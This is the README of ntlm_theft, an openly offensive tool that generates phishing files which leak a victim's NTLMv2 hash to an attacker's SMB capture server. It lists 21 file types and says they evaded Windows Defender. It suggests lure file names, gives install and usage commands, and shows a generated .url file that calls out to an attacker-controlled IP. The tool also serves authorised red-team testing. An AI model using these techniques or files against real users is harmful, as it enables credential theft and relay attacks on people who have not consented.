ntlm_theft
A tool for generating multiple types of NTLMv2 hash theft files.
ntlm_theft
is an Open Source Python3 Tool that generates 21 different types of hash theft documents. These can be used for phishing when either the target allows smb traffic outside their network, or if you are already inside the internal network.
The benefits of these file types over say macro based documents or exploit documents are that all of these are built using “intended functionality”. None were flagged by Windows Defender Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.
ntlm_theft
supports the following attack types:
- Browse to Folder Containing
- .url β via URL field
- .url β via ICONFILE field
- .lnk - via icon_location field
- .scf β via ICONFILE field (Not Working on Latest Windows)
- autorun.inf via OPEN field (Not Working on Latest Windows)
- desktop.ini - via IconResource field (Not Working on Latest Windows)
- Open Document
- .xml β via Microsoft Word external stylesheet
- .xml β via Microsoft Word includepicture field
- .htm β via Chrome & IE & Edge img src (only if opened locally, not hosted)
- .docx β via Microsoft Word includepicture field
- .docx β via Microsoft Word external template
- .docx β via Microsoft Word frameset webSettings
- .xlsx - via Microsoft Excel external cell
- .wax - via Windows Media Player playlist (Better, primary open)
- .asx β via Windows Media Player playlist (Better, primary open)
- .m3u β via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
- .jnlp β via Java external jar
- .application β via any Browser (Must be served via a browser downloaded or wonβt run)
- Open Document and Accept Popup
- .pdf β via Adobe Acrobat Reader
- Click Link in Chat Program
- .txt β formatted link to paste into Zoom chat
Installation
git clone https://github.com/Greenwolf/ntlm_theft.git
python3 -m pip install xlsxwriter
Usage
ntlm_theft.py --generate all --server <ip_of_smb_catcher_server> --filename <base_file_name>
Flags
ntlm_theft by Jacob Wilkin(Greenwolf)
options:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-vv, --verbose Verbose Mode
-g {scf,xlsx,docx,jnlp,zoom,autoruninf,rtf,m3u,desktopini,lnk,wax,application,htm,all,url,pdf,xml,modern,asx}, --generate {scf,xlsx,docx,jnlp,zoom,autoruninf,rtf,m3u,desktopini,lnk,wax,application,htm,all,url,pdf,xml,modern,asx}
Choose to generate all files or a specific filetype
-s SERVER, --server SERVER
The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)
-f FILENAME, --filename FILENAME
The base filename without extension, can be renamed later (test, Board-Meeting2020, Bonus_Payment_Q4)
Required parameters.
-g, --generate : Choose to generate all files or a specific filetype
-s, --server : The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)
-f, --filename : The base filename without extension, can be renamed later (eg: test, Board-Meeting2020, Bonus_Payment_Q4)
Examples
Create LNK file(s)
$ python3 ntlm_theft.py -g lnk -s 10.10.10.10 -f generated-file
Created: generated-file/generated-file.lnk (BROWSE TO FOLDER)
Generation Complete.
Create URL file(s)
$ python3 ntlm_theft.py -g url -s 10.10.10.10 -f generated-url
Created: generated-url/generated-url-(url).url (BROWSE TO FOLDER)
Created: generated-url/generated-url-(icon).url (BROWSE TO FOLDER)
Generation Complete.
$ cat generated-url/generated-url-\(url\).url
[InternetShortcut]
URL=file://10.10.10.10/leak/leak.html